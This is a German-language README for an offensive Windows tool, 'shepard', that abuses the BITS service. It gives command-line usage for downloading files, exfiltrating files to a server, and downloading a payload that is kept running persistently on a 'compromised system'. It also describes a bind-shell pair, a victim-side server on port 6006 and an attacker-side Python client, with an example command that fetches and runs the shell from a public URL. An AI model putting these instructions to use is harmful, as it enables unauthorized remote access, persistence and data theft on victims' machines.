
In Arbeit befindliches persistentes Download-/Upload-/Ausführungstool unter Verwendung von Windows BITS.
Dies ist ein Persistenz-Tool, das den Windows Background Intelligent Transfer Service (BITS) verwendet.
Datei-Download, Datei-Exfiltration, Datei-Download + persistente Ausführung
Führen Sie shepard.exe als Administrator mit den folgenden Befehlszeilenargumenten aus:
-d <remoteLocation> <writePath> : regulärer Datei-Download in einen lokalen Pfad Ihrer Wahl
-e <remoteLocation> <localPath> : regulärer Datei-Upload von einem lokalen Pfad Ihrer Wahl (sendet nur an IIS-Server, dies ist eine Einschränkung von BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : Datei-Download in einen Pfad Ihrer Wahl und versucht, Persistenz aufrechtzuerhalten. Die heruntergeladene Datei wird versuchen, mit optionalFileArgs ausgeführt zu werden, und BITS wird alle 30 Sekunden überprüfen, ob die Datei auf dem kompromittierten System noch läuft.
Wenn dieses Programm ohne Argumente oder mit einer falschen Anzahl von Argumenten ausgeführt wird, wird shepard sauber beendet.
Der Server (Opfer) ist in C# geschrieben. Er hört auf Port 6006.
Führen Sie shepardsbind_serv.exe ohne Argumente aus.
Der Client (Angreifer) ist in Python geschrieben und benötigt ein Argument: die IP-Adresse des Opferrechners.
shepardsbind_recv.py <victim's IP>
Die Ausführung von shepardsbind_recv.py ohne Argumente gibt einen Fehler zurück.
Die einzige ausführbare Datei, die sich auf dem Opferrechner befinden muss, ist shepard.exe. Hosten Sie die herunterzuladende Bindshell-Programmdatei an einem öffentlich zugänglichen Ort. Shepard wird die Bindshell-Programmdatei herunterladen und ausführen, und der Benutzer kann nun den Python-Empfänger verwenden. Wenn die Shell gefunden und beendet wird, startet sie nach 30 Sekunden neu.
Beispiel: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe